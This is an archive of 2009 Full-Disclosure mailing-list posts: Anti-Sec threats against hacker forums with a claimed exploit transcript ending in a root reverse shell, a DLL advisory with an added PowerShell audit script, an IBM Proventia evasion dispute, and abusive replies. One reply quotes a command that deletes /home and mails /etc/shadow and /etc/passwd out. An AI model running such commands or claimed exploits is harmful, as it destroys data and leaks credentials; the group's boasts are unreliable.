[Full-disclosure] Ant-Sec - We are going to terminate Hackforums.net and Milw0rm.com - New Apache 0-day exploit uncovered

2009-07-16 Thread anti-scared- sheep
Hey she...@fd,
Stop being scared about these kids, they fucking suck!
you shouldn't have taken LSD, makes you paranoid even 7 years later, i guess
u guys should consult a doctor.
@anti-sec_kids: This is my server : http://207.182.131.158/index.html
Hack it, and i'll stfu.
While waiting your l33t-prick hack, @reverseDNS on unsecure shared-webhoster,
no wonder i'll laugh @you.


Die in a fire kids.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Ant-Sec - We are going to terminate Hackforums.net and Milw0rm.com - New Apache 0-day exploit uncovered

2009-07-16 Thread Benjamin Cance
anti-scared- sheep wrote:
 Hey she...@fd, 
 Stop being scared about these kids, they fucking suck!
 you shouldn't have taken LSD, makes you paranoid even 7 years later, i
 guess u guys should consult a doctor.
 @anti-sec_kids: This is my server : http://207.182.131.158/index.html
 Hack it, and i'll stfu.
 While waiting your l33t-prick hack, @reverseDNS on unsecure
 shared-webhoster, no wonder i'll laugh @you.


 Die in a fire kids.

Really feelin the font dude. Nice site :)



Re: [Full-disclosure] Ant-Sec - We are going to terminate Hackforums.net and Milw0rm.com - New Apache 0-day exploit uncovered

2009-07-16 Thread webDEViL
lol, what makes you think they will fall for it?

On Thu, Jul 16, 2009 at 9:01 AM, anti-scared- sheep 
securyourbr...@gmail.com wrote:

 Hey she...@fd,
  Stop being scared about these kids, they fucking suck!
 you shouldn't have taken LSD, makes you paranoid even 7 years later, i guess
 u guys should consult a doctor.
  @anti-sec_kids: This is my server : http://207.182.131.158/index.html
 Hack it, and i'll stfu.
 While waiting your l33t-prick hack, @reverseDNS on unsecure
 shared-webhoster, no wonder i'll laugh @you.


 Die in a fire kids.




Re: [Full-disclosure] Ant-Sec - We are going to terminate Hackforums.net and Milw0rm.com - New Apache 0-day exploit uncovered

2009-07-16 Thread Benjamin Cance
webDEViL wrote:
 lol, what makes you think they will fall for it?

 On Thu, Jul 16, 2009 at 9:01 AM, anti-scared- sheep
 securyourbr...@gmail.com wrote:

 Hey she...@fd, 
 Stop being scared about these kids, they fucking suck!
 you shouldn't have taken LSD, makes you paranoid even 7 years
 later, i guess u guys should consult a doctor.
 @anti-sec_kids: This is my server : http://207.182.131.158/index.html
 Hack it, and i'll stfu.
 While waiting your l33t-prick hack, @reverseDNS on unsecure
 shared-webhoster, no wonder i'll laugh @you.


 Die in a fire kids.



they're super leet and have to prove it



Re: [Full-disclosure] seriously, your code

2009-07-16 Thread A . L . M . Buxey
Hi,

 /bin/rm -rf /home/*;clear;echo bl4ckh4t,hehecat /etc/shadow |mail  
 full-disclosure@lists.grok.org.uk cat /etc/passwd |mail  
 full-disclosure@lists.grok.org.uk

 first off if you want to do damage rm -R dumb ass, the one you posted 
 only removes files in /home


perhaps it was *designed* to only delete files from /home = because
if you did a full recursive nasty delete of the whole filesystem
then, not only would there not be a /etc/shadow to mail out, but
also the mail command would not work - and if, by miracle, the command
did work then the mail wouldn't go anywhere because the mailspool dir would
not exist etc. and if, by some crazy broken-system way anything ever
did get off the box, then there wouldn't actually be a box worth logging
into remotely using any credentials that might be in /etc/shadow anyway ;-)

alan



[Full-disclosure] Anti-Sec - We have terminated blackhat-forums.com. Are you scared now Hackforums.net?

2009-07-16 Thread Ant-Sec Movement
Blend in.
Get trusted.
Trust no one.
Own everyone.
Disclose nothing.
Destroy everything.
Take back the scene.
Never sell out, never surrender.
Get in as anonymous, Leave with no trace.
--

Dear Jesse Labrocca (Omniscient) and Hackforums.net,

The Anti-Sec movement has officially terminated Blackhat-forums.com using
yet ANOTHER 0-day exploit that we have discovered. This one takes advantage
of a previously undisclosed LiteSpeed vulnerability. This is primarily to
prove that we are serious and committed to our primary goal
- eradicating full-disclosure of computer vulnerabilities and exploits, and
terminating general discussion of hacking for any n00b and script-kiddie to
read and review - and learn from.

The Anti-Sec movement hopes Hackforums.net now understands that our cyber
war against you is NOT a joke. We will be terminating Hackforums.net. You
are our number one target...we want to savor the moment and the suspense. We
will strike when you least expect it. This we promise.

Here is a brief transcript of the hacking of Blackhat-forums.com:

-

anti-sec:~/pwn# ./litespeed_0day -t blackhat-forums.com -p80

[+] Connecting to blackhat-forums.com:80
[+] Connected Successfully!
[+] Checking for Lightspeed vulnerability...
[+] Vulnerable!
[+] Sending exploit
[-] Phase 1
[-] Phase 2
[-] Phase 3
[+] Injecting Shellcode...
[+] Waiting for reverse shell...

[~] Connected to shell @ 74.86.203.65!

snip

uid=0(root) gid=0 (root) groups=0 (root)

snip

---

By terminating Blackhat-forums.com, we have furthered our goals in more ways
than one.

We are coming for you hackforums.net...and Milw0rm.com. We haven't forgotten
you, Milw0rm. Our juicy Apache 0-day will terminate both websites, which
will cause a major blow to those who support full-disclosure of hacking
related information.

Take out two birds with one stone.

Sincerely,

-anti-sec

[Full-disclosure] Vulnerable DLLs distributed with Terratec HomeCinema 6.3

2009-07-16 Thread Stefan Kanthak
Once again a sad story of poor software engineering, missing QA
and a TOTALLY unresponsive vendor.

The current version 6.3 of Terratec's TV software HomeCinema
http://ftp.terratec.de/Receiver/TerraTec_HomeCinema/TerraTec_Home_Cinema_6.3.exe
from 2009-05-05 installs outdated and vulnerable .DLLs (the
test system used is a fully patched German Windows XP SP3):


1. Version 1.2.2 of ZLIB1.DLL is installed as
   %ProgramFiles%\TerraTec\TerraTec HomeCinema\zlib1.dll.

   Current since 2005-07-18 is version 1.2.3 of ZLIB1.DLL
   (see http://zlib.org/):

| Version 1.2.3 eliminates potential security vulnerabilities in
| zlib 1.2.1 and 1.2.2, so all users of those versions should
| *upgrade* *immediately*.


2. Version 5.1.3102.2180 of Microsoft's GDIPLUS.DLL is installed as
   %SystemRoot%\SYSTEM32\GDIPLUS.DLL.

   The current version of GDIPLUS.DLL for Windows XP SP3 is
   5.1.3102.5512, which is already part of the system and installed
   into Windows' side-by-side cache under %SystemRoot%\WinSxS\!

   According to the MSDN GDIPLUS.DLL MUST NOT be installed into
   %SystemRoot%\SYSTEM32\, and DLLs distributed with Windows
   MUST NOT be redistributed by ISVs.

   In addition see the MSFT security bulletin MS08-052
   http://www.microsoft.com/technet/security/bulletin/MS08-052.mspx
   as well as the MSFT knowledge base article 954593
   http://support.microsoft.com/kb/954593/en-us.


3. The DLLs of the current version of the component MSXML4 SP2 are
   installed to %SystemRoot%\SYSTEM32\.

   This component is however not installed from the redistributable
   package provided by Microsoft that ISVs have to use to meet the
   legal mumbo-jumbo, instead Terratec chose to repackage the DLLs
   into an NSIS installer, thus violating MSFT's redistribution
   policy.

   (Un)fortunately this NSIS installer is flawed and does not
   perform all the necessary steps needed for a clean installation
   of MSXML4 SP2, so Microsoft Update detects the MSXML4 SP2
   installation as outdated/incomplete and fetches the current
   patch installer (http://support.microsoft.com/kb/954430/en-us,
   http://www.microsoft.com/technet/security/bulletin/MS08-069.mspx)
   to repair it.

   The best of all: MSXML4 is NOT referenced at all by the installed
   application CynergyDVR.EXE, which however uses XMLLITE.DLL
   (http://support.microsoft.com/kb/915865/en-us) instead.


4. A superfluous pthreadVC2.dll is installed as
   %CommonProgramFiles%\TerraTec\Cyberlink\Decoder\pthreadVC2.dll


Stefan Kanthak

PS: Tools like Secunia's PSI don't detect such outdated and
vulnerable DLLs. Admin beware!


TIMELINE:

2009-06-16  phone call with Terratec's hotline - they were unable
            to take any action, but requested to send report per
            mail

2009-06-17  sent mail to Terratec - no response

2009-06-30  resent mail to Terratec - again no response

2009-07-16  report published
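
A check for the file-based findings in the advisory above, as an added example that is not part of the original post: it reads the version resource of each DLL at the paths the advisory names and flags copies that are below the quoted versions or that the advisory says should not be there. The function names, the `ShouldExist` flag and the status values are illustrative, the `SYSTEM32` rule reflects the advisory's Windows XP SP3 setup, and it assumes zlib1.dll carries a version resource of the form 1.2.x.0.

```powershell
# Added example (not from the advisory): audit the DLL locations it names.
# Paths and minimum versions are the ones quoted in the advisory; function
# names, the ShouldExist flag and the Status values are illustrative.

$Baseline = @(
    # Private zlib copy: the installer drops 1.2.2, zlib.org says use 1.2.3.
    @{ Path = '%ProgramFiles%\TerraTec\TerraTec HomeCinema\zlib1.dll'
       MinVersion = '1.2.3.0'; ShouldExist = $true }
    # Advisory: GDIPLUS.DLL belongs in WinSxS, not in SYSTEM32 (XP SP3).
    @{ Path = '%SystemRoot%\SYSTEM32\GDIPLUS.DLL'
       MinVersion = '5.1.3102.5512'; ShouldExist = $false }
    # Advisory calls this copy superfluous; it gives no version for it.
    @{ Path = '%CommonProgramFiles%\TerraTec\Cyberlink\Decoder\pthreadVC2.dll'
       MinVersion = $null; ShouldExist = $false }
)

function Get-DllFileVersion {
    param([Parameter(Mandatory = $true)][string]$Path)
    $info = [System.Diagnostics.FileVersionInfo]::GetVersionInfo($Path)
    # Use the numeric fields: the FileVersion string may contain free text.
    # A file without a version resource reads as 0.0.0.0 and is therefore
    # reported as Outdated, which is the safe direction for an audit.
    New-Object System.Version -ArgumentList @(
        $info.FileMajorPart, $info.FileMinorPart,
        $info.FileBuildPart, $info.FilePrivatePart)
}

function Test-DllBaseline {
    param([Parameter(Mandatory = $true)][hashtable[]]$Entries)
    foreach ($entry in $Entries) {
        $path   = [Environment]::ExpandEnvironmentVariables($entry.Path)
        $found  = $null
        $status = 'NotPresent'
        if (Test-Path -LiteralPath $path -PathType Leaf) {
            $found = Get-DllFileVersion -Path $path
            if ($entry.MinVersion -and $found -lt [version]$entry.MinVersion) {
                $status = 'Outdated'      # below the version the advisory cites
            } elseif (-not $entry.ShouldExist) {
                $status = 'Unexpected'    # current, but in a place it should not be
            } else {
                $status = 'OK'
            }
        }
        [pscustomobject]@{
            Path    = $path
            Found   = $found
            Minimum = $entry.MinVersion
            Status  = $status
        }
    }
}

Test-DllBaseline -Entries $Baseline | Format-Table -AutoSize
```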



[Full-disclosure] ANT-SEC

2009-07-16 Thread ant-sec
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

  ____      _ 
 /   |  / | / /_  __/  / ___// / /
/ /| | /  |/ / / /_\__ \/ __/ / /
   / ___ |/ /|  / / /_/__/ / /___/ /___
  /_/  |_/_/ |_/ /_/ //_/\/


WE ARE DEDICATED TO THE ERADICATION OF ANY WHITE HAT ANTS,
WHITE HAT TERMITES, WHITE SHEETS, ANYTHING THAT STIMULATES
 ALL THREE TYPES OF COLOR SENSITIVE CONE CELLS IN
THE HUMAN EYE


WE HAVE THE ABILITY TO USE FIGLET
WE HAVE THE ABILITY TO USE VI TO CREATE FAKE EXPLOIT LOGS
WE ARE PROBABLY SOME FAGGY 4-CHAN ANONYMOUS LEGION CUNTS

WE ARE NOT ORGANISED INTO CELLS. WE DO NOT HAVE A GANG OR A
CREW OR A HIVE. WE HAVE A WHOLE FUCKING COLONY DEEP UNDERGROUND
IN PLACES YOU DONT EVEN KNOW CAN EXIST.


# ./1tf33lzb1gg3rth3n1tl00kztrustm3b4by

  1) Fake exploit
  2) gay pr0n
  3) ascii ant

 3
YEAH TAKE IT TAKE IT BITCH, WHAT, YES, OH, YES IT IS IN :(

 \   /
  \ /
   \.-./
  (o\^/o)  _   _   _ __
   ./ \.\ ( )-( )-( ) .-'  '-.
{-} \(//  ||   \\/ (   )) '-.
 //-__||__.-\\.   .-'
(/() \)'-._.-'
||||  \\
MJP ('('   ')


NOW YOU HAVE SEEN A SMALL PORTION OF OUR POWER

PRAY YOU DO NOT MAKE US USE IT AGAIN

  Signed: The ANT-sec Movement
-BEGIN PGP SIGNATURE-
Charset: UTF8
Version: Hush 3.0
Note: This signature can be verified at https://www.hushtools.com/verify

-END PGP SIGNATURE-



[Full-disclosure] Anti-Sec - We have Terminated Blackhat-forums. Are you scared now HackForums?

2009-07-16 Thread Ant-Sec Movement
Blend in.
Get trusted.
Trust no one.
Own everyone.
Disclose nothing.
Destroy everything.
Take back the scene.
Never sell out, never surrender.
Get in as anonymous, Leave with no trace.

--

Dear Jesse Labrocca (Omniscient) and Hackforums.net,

The Anti-Sec movement has officially terminated Blackhat-forums.com using
yet ANOTHER 0-day exploit that we have discovered. This one takes advantage
of a previously undisclosed LiteSpeed vulnerability. This is primarily to
prove that we are serious and committed to our primary goal - eradicating
full-disclosure of computer vulnerabilities and exploits, and terminating
general discussion of hacking for any n00b and script-kiddie to read and
review - and learn from.

The Anti-Sec movement hopes Hackforums.net now understands that our cyber
war against you is NOT a joke. We will be terminating Hackforums.net. You
are our number one target...we want to savor the moment and the suspense. We
will strike when you least expect it. This we promise.

Here is a brief transcript of the hacking of Blackhat-forums.com:

-

anti-sec:~/pwn# ./litespeed_0day -t blackhat-forums.com -p80

[+] Connecting to blackhat-forums.com:80
[+] Connected Successfully!
[+] Checking for Lightspeed vulnerability...
[+] Vulnerable!
[+] Sending exploit
[-] Phase 1
[-] Phase 2
[-] Phase 3
[+] Injecting Shellcode...
[+] Waiting for reverse shell...

[~] Connected to shell @ 74.86.203.65!

snip

uid=0(root) gid=0 (root) groups=0 (root)

snip

---

By terminating Blackhat-forums.com, we have furthered our goals in more ways
than one.

We are coming for you hackforums.net...and Milw0rm.com. We haven't forgotten
you, Milw0rm. Our juicy Apache 0-day will terminate both websites, which
will cause a major blow to those who support full-disclosure of hacking
related information.

Take out two birds with one stone.

Sincerely,

-anti-sec

Re: [Full-disclosure] Anti-Sec - We have Terminated Blackhat-forums. Are you scared now HackForums?

2009-07-16 Thread Benjamin Cance
Seriously, you're as delusional as these radical movements who blow up
buildings and kill people preaching how they feel the West is wrong
and old ways are best. I see a lot of parallels between them and you.
You need help, you need a new hobby. Taking down these sites is as
productive as masturbation. It feels good yes, but is it really that
satisfying? Nevermind that, you will do what you think is in your
movement's best interest.

Regardless, I wish you well in your endeavors. Hope the FBI talk to you
eventually as you're infringing on the first amendment :)

Ant-Sec Movement wrote:
 Blend in. 
 Get trusted. 
 Trust no one. 
 Own everyone. 
 Disclose nothing. 
 Destroy everything. 
 Take back the scene. 
 Never sell out, never surrender. 
 Get in as anonymous, Leave with no trace. 

 --

 Dear Jesse Labrocca (Omniscient) and Hackforums.net, 

 The Anti-Sec movement has officially terminated Blackhat-forums.com
 using yet ANOTHER 0-day exploit that we have discovered. This one
 takes advantage of a previously undisclosed LiteSpeed vulnerability.
 This is primarily to prove that we are serious and committed to our
 primary goal - eradicating full-disclosure of computer vulnerabilities
 and exploits, and terminating general discussion of hacking for any
 n00b and script-kiddie to read and review - and learn from. 

 The Anti-Sec movement hopes Hackforums.net now understands that our
 cyber war against you is NOT a joke. We will be terminating
 Hackforums.net. You are our number one target...we want to savor the
 moment and the suspense. We will strike when you least expect it. This
 we promise. 

 Here is a brief transcript of the hacking of Blackhat-forums.com: 

 -

 anti-sec:~/pwn# ./litespeed_0day -t blackhat-forums.com -p80

 [+] Connecting to blackhat-forums.com:80
 [+] Connected Successfully!
 [+] Checking for Lightspeed vulnerability...
 [+] Vulnerable!
 [+] Sending exploit 
 [-] Phase 1
 [-] Phase 2
 [-] Phase 3 
 [+] Injecting Shellcode...
 [+] Waiting for reverse shell...

 [~] Connected to shell @ 74.86.203.65!

 snip

 uid=0(root) gid=0 (root) groups=0 (root) 

 snip

 ---

 By terminating Blackhat-forums.com, we have furthered our goals in
 more ways than one.

 We are coming for you hackforums.net...and Milw0rm.com. We haven't
 forgotten you, Milw0rm. Our juicy Apache 0-day will terminate both
 websites, which will cause a major blow to those who support
 full-disclosure of hacking related information. 

 Take out two birds with one stone.  

 Sincerely,

 -anti-sec 
 



Re: [Full-disclosure] Anti-Sec - We have Terminated Blackhat-forums. Are you scared now HackForums?

2009-07-16 Thread Ant-Sec Movement
The Anti-Sec movement is not just one person. We are a group of people from
all over the world. We are almost a culture unto ourselves. We are threaded
throughout the spokes of everyday life.
We have committed no crimes - our endeavors will ultimately cut down
computer crime to some degree. The amount of innocent people getting hit
with financial losses as a result of malicious computer hacking will
decrease significantly because hacker communities like Blackhat-forums and
Astalavista have been terminated - or at least for a time, which is still a
gain.

This is ultimately a hacker war.

Furthermore, the Poster of this message is merely a standard bearer of a
faction of the Anti-Sec Movement. The Poster of this message is not a
hacker, but is merely reporting the movements of Anti-Sec.

Sincerely,

-anti-sec

Please check out our website at: http://romeo.copyandpaste.info/





On Thu, Jul 16, 2009 at 7:39 PM, Benjamin Cance
cance.consult...@gmail.com wrote:

 Seriously, you're as delusional as these radical movements who blow up
 buildings and kill people preaching how they feel the West is wrong
 and old ways are best. I see a lot of parallels between them and you.
 You need help, you need a new hobby. Taking down these sites is as
 productive as masturbation. It feels good yes, but is it really that
 satisfying? Nevermind that, you will do what you think is in your
 movement's best interest.

 Regardless, I wish you well in your endeavors. Hope the FBI talk to you
 eventually as you're infringing on the first amendment :)

 Ant-Sec Movement wrote:
  Blend in.
  Get trusted.
  Trust no one.
  Own everyone.
  Disclose nothing.
  Destroy everything.
  Take back the scene.
  Never sell out, never surrender.
  Get in as anonymous, Leave with no trace.
 
  --
 
  Dear Jesse Labrocca (Omniscient) and Hackforums.net,
 
  The Anti-Sec movement has officially terminated Blackhat-forums.com
  using yet ANOTHER 0-day exploit that we have discovered. This one
  takes advantage of a previously undisclosed LiteSpeed vulnerability.
  This is primarily to prove that we are serious and committed to our
  primary goal - eradicating full-disclosure of computer vulnerabilities
  and exploits, and terminating general discussion of hacking for any
  n00b and script-kiddie to read and review - and learn from.
 
  The Anti-Sec movement hopes Hackforums.net now understands that our
  cyber war against you is NOT a joke. We will be terminating
  Hackforums.net. You are our number one target...we want to savor the
  moment and the suspense. We will strike when you least expect it. This
  we promise.
 
  Here is a brief transcript of the hacking of Blackhat-forums.com:
 
  -
 
  anti-sec:~/pwn# ./litespeed_0day -t blackhat-forums.com -p80
 
  [+] Connecting to blackhat-forums.com:80
  [+] Connected Successfully!
  [+] Checking for Lightspeed vulnerability...
  [+] Vulnerable!
  [+] Sending exploit
  [-] Phase 1
  [-] Phase 2
  [-] Phase 3
  [+] Injecting Shellcode...
  [+] Waiting for reverse shell...
 
  [~] Connected to shell @ 74.86.203.65!
 
  snip
 
  uid=0(root) gid=0 (root) groups=0 (root)
 
  snip
 
  ---
 
  By terminating Blackhat-forums.com, we have furthered our goals in
  more ways than one.
 
  We are coming for you hackforums.net...and Milw0rm.com. We haven't
  forgotten you, Milw0rm. Our juicy Apache 0-day will terminate both
  websites, which will cause a major blow to those who support
  full-disclosure of hacking related information.
 
  Take out two birds with one stone.
 
  Sincerely,
 
  -anti-sec
  
 

Re: [Full-disclosure] Update: [TZO-06-2009] IBM Proventia - Generic bypass (Limited disclosure - see details)

2009-07-16 Thread Vladimir '3APA3A' Dubrovin
Thierry,

 I think inability of antivirus / intrusion detection to catch something
 that is not malware/intrusion or malware in the form unused in-the-wild
 is   not  vulnerability.  Antivirus  (generally)  gives  no  preventive
 protection.  They  can add signatures for your PoCs to their database -
 and that's how it works.

--Thursday, July 16, 2009, 12:02:35 AM, you wrote to bugt...@securityfocus.com:



TZ As I received a lot of feedback on this bug, I thought I'd update you. After not replying
TZ to my notifications and subsequent forced partial disclosure, IBM stated
TZ officially on their website that they were not affected and to my surprise
TZ IBM got in contact immediately after disclosure to coordinate

TZ If you read the Timeline till the end, the story has a nice swing.., Drama, insults,
TZ everything. You could make a soap opera out of it. And you don't even have all the mails.

TZ What happened during this coordination even surprised myself. I am used to discussions,
TZ I am used to stupid answers. However what happened here bears no description.


TZ Short Guerilla Version of the Timeline  (complete timeline below):
TZ ---
TZ - Hey Thierry sorry, we did not get your report, we'll keep you updated!
TZ We have IBM written on the proventia boxes but don't send reports to IBM!!

TZ - Post official statement to IBM website that IBM is NOT affected and
TZ forgetting to inform Thierry

TZ - Thierry, You cannot evade proventia, because we use special proprietary
TZ ingredients!

 What are these ingredients?

TZ - We won't tell !! and by the way you suck! your test methods suck! You aren't even
TZ EAL2 ! A test team costs too much to test your POCs! Your mails suck! Learn from
TZ the big mighty IBM. 

 Sorry, the same poc evaded proventia last year! So you must miss something!!

TZ - Thierry, stop sending us POC files, YOU CANNOT EVADE PROVENTIA, IT is
TZ IMPOSSIBLE, IRREVOCABLE, PERIOD 

Silence

TZ - Thierry here is our report, you DID evade all our proventia products, we will
TZ credit you.



TZ In the timeline below you find my summary
TZ -
TZ 02.04.2009 - Forced partial disclosure
TZ 02.04.2009 - A known contact at IBM asks for the POC
TZ 02.04.2009 - POC is resent
TZ 02.04.2009 - A third person is added to the coordination list
TZ 04.04.2009 - Sending another POC file (RAR)
TZ 06.04.2009 - POC is acknowledged and promise is made to get back
TZ  once the material has been analysed.
TZ 10.04.2009 - Sending another POC file (ZIP)
TZ 10.04.2009 - The third person ergo the Cyber
TZ Incident  Vulnerability Handling PM is taking over coordination

TZ 14.04.2009 - A comment was made to my blog that indicated IBM did
TZ answer the Bugtraq posting and negate my findings, having 
TZ received no response from them personally I ask
TZ Dear Peter, I was referred to this url in a comment posted to my blog:
TZ http://iss.custhelp.com/cgi-bin/iss.cfg/php/enduser/std_adp.php?p_faqid=5417
TZ can you confirm this ?

TZ 15.04.2009 -  IBM responds:
TZ [..] we
TZ apologize that the path of communicating the disclosure was somewhat
TZ confusing.  [..]  The IBM contact address in the
TZ OSVDB is typically used for software products that are in another division
TZ of IBM, and thus, your report was not routed to us in a timely manner.  In
TZ the future, we'd prefer that you contact myself directly

TZ We have now investigated the TZO-04-2009-IBM incident you reported and have
TZ found that we are not susceptible to this evasion.
TZ [..]in  this  case,  there  are  other  components in our Proventia
TZ products that prevent this evasion from occurring
TZ Testing our production products, rather than testing this one
TZ piece of our technology, then you would have been able to see the same
TZ results

TZ 16.04.2009 - As my tests indicate otherwise I ask Could you please
TZ specify which components would prevent the evasion, as it is
TZ hard  to see how to prevent it when the unarchiver code cannot extract
TZ the code itself and
TZ I  would  be  glad  to do so [Red:test production products] : 
TZ Please send the respective appliances to my address


TZ 16.04.2009 - IBM answers
TZ [..] We are not an open source company, so the internal workings of
TZ our proprietary software is not something we publicly disclose.  
TZ We do not provide our products for free to all of the independent 
TZ testers that might be interested in our product lines--the number 
TZ of requests simply would not be scalable or manageable if
TZ we did

TZ 17.04.2009 - As I have no way to reproduce and IBM gives no details
TZ about their OH-SO Secret proprietary software I state that 
TZ I  cannot  verify  nor  reproduce your statements as such I will leave
TZ this CVE entry as disputed. Please provide tangible proof that 
TZ you detect the samples. Screenshots, logs, outputs.
TZ AND
TZ My  worktime  is not open source either[..] 

Re: [Full-disclosure] Anti-Sec - We have Terminated Blackhat-forums. Are you scared now HackForums?

2009-07-16 Thread Ureleet
n3td3v?  iz that u?  lying again?  do i need 2 bust u out?

On Thu, Jul 16, 2009 at 6:00 AM, Ant-Sec Movement
anti.sec.movem...@gmail.com wrote:
 The Anti-Sec movement is not just one person. We are a group of people from
 all over the world. We are almost a culture unto ourselves. We are threaded
 throughout the spokes of everyday life.
 We have committed no crimes - our endeavors will ultimately cut down
 computer crime to some degree. The amount of innocent people getting hit
 with financial losses as a result of malicious computer hacking will
 decrease significantly because hacker communities like Blackhat-forums and
 Astalavista have been terminated - or at least for a time, which is still a
 gain.
 This is ultimately a hacker war.
 Furthermore, the Poster of this message is merely a standard bearer of a
 faction of the Anti-Sec Movement. The Poster of this message is not a
 hacker, but is merely reporting the movements of Anti-Sec.
 Sincerely,
 -anti-sec
 Please check out our website at: http://romeo.copyandpaste.info/




 On Thu, Jul 16, 2009 at 7:39 PM, Benjamin Cance cance.consult...@gmail.com
 wrote:

 Seriously, you're as delusional as these radical movements who blow up
 buildings and kill people preaching how they feel the West is wrong
 and old ways are best. I see a lot of parallels between them and you.
 You need help, you need a new hobby. Taking down these sites is as
 productive as masturbation. It feels good yes, but is it really that
 satisfying? Nevermind that, you will do what you think is in your
 movement's best interest.

 Regardless, I wish you well in your endeavors. Hope the FBI talk to you
 eventually as you're infringing on the first amendment :)

 Ant-Sec Movement wrote:
  Blend in.
  Get trusted.
  Trust no one.
  Own everyone.
  Disclose nothing.
  Destroy everything.
  Take back the scene.
  Never sell out, never surrender.
  Get in as anonymous, Leave with no trace.
 
  --
 
  Dear Jesse Labrocca (Omniscient) and Hackforums.net,
 
  The Anti-Sec movement has officially terminated Blackhat-forums.com
  using yet ANOTHER 0-day exploit that we have discovered. This one
  takes advantage of a previously undisclosed LiteSpeed vulnerability.
  This is primarily to prove that we are serious and committed to our
  primary goal - eradicating full-disclosure of computer vulnerabilities
  and exploits, and terminating general discussion of hacking for any
  n00b and script-kiddie to read and review - and learn from.
 
  The Anti-Sec movement hopes Hackforums.net now understands that our
  cyber war against you is NOT a joke. We will be terminating
  Hackforums.net. You are our number one target...we want to savor the
  moment and the suspense. We will strike when you least expect it. This
  we promise.
 
  Here is a brief transcript of the hacking of Blackhat-forums.com:
 
  -
 
  anti-sec:~/pwn# ./litespeed_0day -t blackhat-forums.com -p80
 
  [+] Connecting to blackhat-forums.com:80
  [+] Connected Successfully!
  [+] Checking for Lightspeed vulnerability...
  [+] Vulnerable!
  [+] Sending exploit
  [-] Phase 1
  [-] Phase 2
  [-] Phase 3
  [+] Injecting Shellcode...
  [+] Waiting for reverse shell...
 
  [~] Connected to shell @ 74.86.203.65!
 
  snip
 
  uid=0(root) gid=0 (root) groups=0 (root)
 
  snip
 
  ---
 
  By terminating Blackhat-forums.com, we have furthered our goals in
  more ways than one.
 
  We are coming for you hackforums.net...and Milw0rm.com. We haven't
  forgotten you, Milw0rm. Our juicy Apache 0-day will terminate both
  websites, which will cause a major blow to those who support
  full-disclosure of hacking related information.
 
  Take out two birds with one stone.
 
  Sincerely,
 
  -anti-sec
  
 


Re: [Full-disclosure] Update: [TZO-06-2009] IBM Proventia - Generic bypass (Limited disclosure - see details)

2009-07-16 Thread Thierry Zoller
Hi Vladimir,

Please  understand  that  I will not enter that discussion any longer.
Please note that :
V3D is not malware/intrusion or malware in the form unused in-the-wild
V3D  is   not  vulnerability.

Is false. It is recognised malware, else the test wouldn't make sense - obviously.


Regards,
Thierry

V3D Thierry,

V3D  I think inability of antivirus / intrusion detection to catch something
V3D  that is not malware/intrusion or malware in the form unused in-the-wild
V3D  is   not  vulnerability.  Antivirus  (generally)  gives  no  preventive
V3D  protection.  They  can add signatures for your PoCs to their database -
V3D  and that's how it works.

V3D --Thursday, July 16, 2009, 12:02:35 AM, you wrote to bugt...@securityfocus.com:



TZ As I received a lot of feedback on this bug, I thought I'd update you. After not replying
TZ to my notifications and subsequent forced partial disclosure, IBM stated
TZ officially on their website that they were not affected and to my surprise
TZ IBM got in contact immediately after disclosure to coordinate

TZ If you read the Timeline till the end, the story has a nice swing.., Drama, insults,
TZ everything. You could make a soap opera out of it. And you don't even have all the mails.

TZ What happened during this coordination even surprised myself. I am used to discussions,
TZ I am used to stupid answers. However what happened here bears no description.


TZ Short Guerilla Version of the Timeline  (complete timeline below):
TZ ---
TZ - Hey Thierry sorry, we did not get your report, we'll keep you updated!
TZ We have IBM written on the proventia boxes but don't send reports to IBM!!

TZ - Post official statement to IBM website that IBM is NOT affected and
TZ forgetting to inform Thierry

TZ - Thierry, You cannot evade proventia, because we use special proprietary
TZ ingredients!

 What are these ingredients?

TZ - We won't tell !! and by the way you suck! your test methods suck! You aren't even
TZ EAL2 ! A test team costs too much to test your POCs! Your mails suck! Learn from
TZ the big mighty IBM.

 Sorry, the same poc evaded proventia last year! So you must miss something!!

TZ - Thierry, stop sending us POC files, YOU CANNOT EVADE PROVENTIA, IT is
TZ IMPOSSIBLE, IRREVOCABLE, PERIOD

Silence

TZ - Thierry here is our report, you DID evade all our proventia products, we will
TZ credit you.



TZ In the timeline below you find my summary
TZ -
TZ 02.04.2009 - Forced partial disclose
TZ 02.04.2009 - A known contact at IBM asks for the POC
TZ 02.04.2009 - POC is resent
TZ 02.04.2009 - A third person is added to the coordination list
TZ 04.04.2009 - Sending another POC file (RAR)
TZ 06.04.2009 - POC is acknowledged and promise is made to get back
TZ  once the material has been analysed.
TZ 10.04.2009 - Sending another POC file (ZIP)
TZ 10.04.2009 - The third person ergo the Cyber
TZ Incident  Vulnerability Handling PM is taking over coordination

TZ 14.04.2009 - A comment was made to my blog that indicated IBM did
TZ answer the Bugtraq posting and negate my findings, having
TZ received no response from them personally I ask
TZ Dear Peter, I was referred to this url in a comment posted to my blog:
TZ http://iss.custhelp.com/cgi-bin/iss.cfg/php/enduser/std_adp.php?p_faqid=5417
TZ can you confirm this ?

TZ 15.04.2009 -  IBM responds:
TZ [..] we
TZ apologize that the path of communicating the disclosure was somewhat
TZ confusing.  [..]  The IBM contact address in the
TZ OSVDB is typically used for software products that are in another division
TZ of IBM, and thus, your report was not routed to us in a timely manner.  In
TZ the future, we'd prefer that you contact myself directly

TZ We have now investigated the TZO-04-2009-IBM incident you reported and have
TZ found that we are not susceptible to this evasion.
TZ [..]in  this  case,  there  are  other  components in our Proventia
TZ products that prevent this evasion from occurring
TZ Testing our production products, rather than testing this one
TZ piece of our technology, then you would have been able to see the same
TZ results

TZ 16.04.2009 - As my tests indicate otherwise I ask Could you please
TZ specify which components would prevent the evasion, as it is
TZ hard  to see how to prevent it when the unarchiver code cannot extract
TZ the code itself and
TZ I  would  be  glad  to do so [Red:test production products] :
TZ Please send the respective appliances to my address


TZ 16.04.2009 - IBM answers
TZ [..] We are not an open source company, so the internal workings of
TZ our proprietary software is not something we publicly disclose.  
TZ We do not provide our products for free to all of the independent 
TZ testers that might be interested in our product lines--the number 
TZ of requests simply would not be scalable or manageable if
TZ we did

TZ 17.04.2009 - As I have no 

Re: [Full-disclosure] Anti-Sec - We have Terminated Blackhat-forums. Are you scared now HackForums?

2009-07-16 Thread Benjamin Cance
*Rules of Engagement*:
Don't get too cocky.
Don't underestimate anyone.


These frequent posts sound as if you are in violation of your own RoE.


